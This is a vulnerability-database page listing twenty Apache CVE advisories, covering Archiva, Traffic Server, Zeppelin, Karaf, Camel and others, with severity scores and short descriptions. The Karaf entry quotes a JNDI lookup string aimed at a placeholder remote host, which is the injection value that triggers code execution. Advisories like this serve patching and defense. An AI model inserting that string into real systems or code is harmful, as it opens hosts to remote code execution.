Filtered by vendor Apache
Subscriptions
Total
2632 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2017-7682 | 1 Apache | 1 Openmeetings | 2025-04-20 | N/A |
| Apache OpenMeetings 3.2.0 is vulnerable to parameter manipulation attacks, as a result attacker has access to restricted areas. | ||||
| CVE-2016-5003 | 2 Apache, Redhat | 4 Ws-xmlrpc, Enterprise Linux, Jboss Fuse and 1 more | 2025-04-20 | N/A |
| The Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to execute arbitrary code via a crafted serialized Java object in an <ex:serializable> element. | ||||
| CVE-2016-5002 | 2 Apache, Redhat | 2 Xml-rpc, Jboss Fuse | 2025-04-20 | N/A |
| XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD. | ||||
| CVE-2016-0779 | 1 Apache | 1 Tomee | 2025-04-20 | N/A |
| The EjbObjectInputStream class in Apache TomEE before 1.7.4 and 7.x before 7.0.0-M3 allows remote attackers to execute arbitrary code via a crafted serialized object. | ||||
| CVE-2017-5657 | 1 Apache | 1 Archiva | 2025-04-20 | N/A |
| Several REST service endpoints of Apache Archiva are not protected against Cross Site Request Forgery (CSRF) attacks. A malicious site opened in the same browser as the archiva site, may send an HTML response that performs arbitrary actions on archiva services, with the same rights as the active archiva session (e.g. administrator rights). | ||||
| CVE-2017-5642 | 1 Apache | 1 Ambari | 2025-04-20 | N/A |
| During installation of Ambari 2.4.0 through 2.4.2, Ambari Server artifacts are not created with proper ACLs. | ||||
| CVE-2022-34271 | 1 Apache | 1 Atlas | 2025-04-18 | 8.8 High |
| A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0. | ||||
| CVE-2022-32531 | 1 Apache | 1 Bookkeeper | 2025-04-17 | 5.9 Medium |
| The Apache Bookkeeper Java Client (before 4.14.6 and also 4.15.0) does not close the connection to the bookkeeper server when TLS hostname verification fails. This leaves the bookkeeper client vulnerable to a man in the middle attack. The problem affects BookKeeper client prior to versions 4.14.6 and 4.15.1. | ||||
| CVE-2022-46870 | 1 Apache | 1 Zeppelin | 2025-04-17 | 5.4 Medium |
| An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Zeppelin allows logged-in users to execute arbitrary javascript in other users' browsers. This issue affects Apache Zeppelin before 0.8.2. Users are recommended to upgrade to a supported version of Zeppelin. | ||||
| CVE-2021-28655 | 1 Apache | 1 Zeppelin | 2025-04-17 | 6.5 Medium |
| The improper Input Validation vulnerability in "”Move folder to Trash” feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions. | ||||
| CVE-2022-47500 | 1 Apache | 1 Helix | 2025-04-17 | 6.1 Medium |
| URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Software Foundation Apache Helix UI component.This issue affects Apache Helix all releases from 0.8.0 to 1.0.4. Solution: removed the the forward component since it was improper designed for UI embedding. User please upgrade to 1.1.0 to fix this issue. | ||||
| CVE-2022-40743 | 1 Apache | 1 Traffic Server | 2025-04-17 | 6.1 Medium |
| Improper Input Validation vulnerability for the xdebug plugin in Apache Software Foundation Apache Traffic Server can lead to cross site scripting and cache poisoning attacks.This issue affects Apache Traffic Server: 9.0.0 to 9.1.3. Users should upgrade to 9.1.4 or later versions. | ||||
| CVE-2022-37392 | 1 Apache | 1 Traffic Server | 2025-04-17 | 5.3 Medium |
| Improper Check for Unusual or Exceptional Conditions vulnerability in handling the requests to Apache Traffic Server. This issue affects Apache Traffic Server 8.0.0 to 9.1.2. | ||||
| CVE-2022-32749 | 1 Apache | 1 Traffic Server | 2025-04-17 | 7.5 High |
| Improper Check for Unusual or Exceptional Conditions vulnerability handling requests in Apache Traffic Server allows an attacker to crash the server under certain conditions. This issue affects Apache Traffic Server: from 8.0.0 through 9.1.3. | ||||
| CVE-2022-46421 | 1 Apache | 1 Apache-airflow-providers-apache-hive | 2025-04-16 | 9.8 Critical |
| Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0. | ||||
| CVE-2022-40145 | 1 Apache | 1 Karaf | 2025-04-15 | 9.8 Critical |
| This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 | ||||
| CVE-2022-45347 | 1 Apache | 1 Shardingsphere | 2025-04-15 | 9.8 Critical |
| Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0. | ||||
| CVE-2025-29868 | 1 Apache | 1 Answer | 2025-04-15 | 6.5 Medium |
| Private Data Structure Returned From A Public Method vulnerability in Apache Answer. This issue affects Apache Answer: through 1.4.2. If a user uses an externally referenced image, when a user accesses this image, the provider of the image may obtain private information about the ip address of that accessing user. Users are recommended to upgrade to version 1.4.5, which fixes the issue. In the new version, administrators can set whether external content can be displayed. | ||||
| CVE-2025-30177 | 1 Apache | 1 Camel | 2025-04-15 | 6.5 Medium |
| Bypass/Injection vulnerability in Apache Camel in Camel-Undertow component under particular conditions. This issue affects Apache Camel: from 4.10.0 before 4.10.3, from 4.8.0 before 4.8.6. Users are recommended to upgrade to version 4.10.3 for 4.10.x LTS and 4.8.6 for 4.8.x LTS. Camel undertow component is vulnerable to Camel message header injection, in particular the custom header filter strategy used by the component only filter the "out" direction, while it doesn't filter the "in" direction. This allows an attacker to include Camel specific headers that for some Camel components can alter the behaviour such as the camel-bean component, or the camel-exec component. | ||||
| CVE-2016-0735 | 1 Apache | 1 Ranger | 2025-04-12 | N/A |
| Apache Ranger 0.5.x before 0.5.2 allows remote authenticated users to bypass intended parent resource-level access restrictions by leveraging mishandling of a resource-level exclude policy. | ||||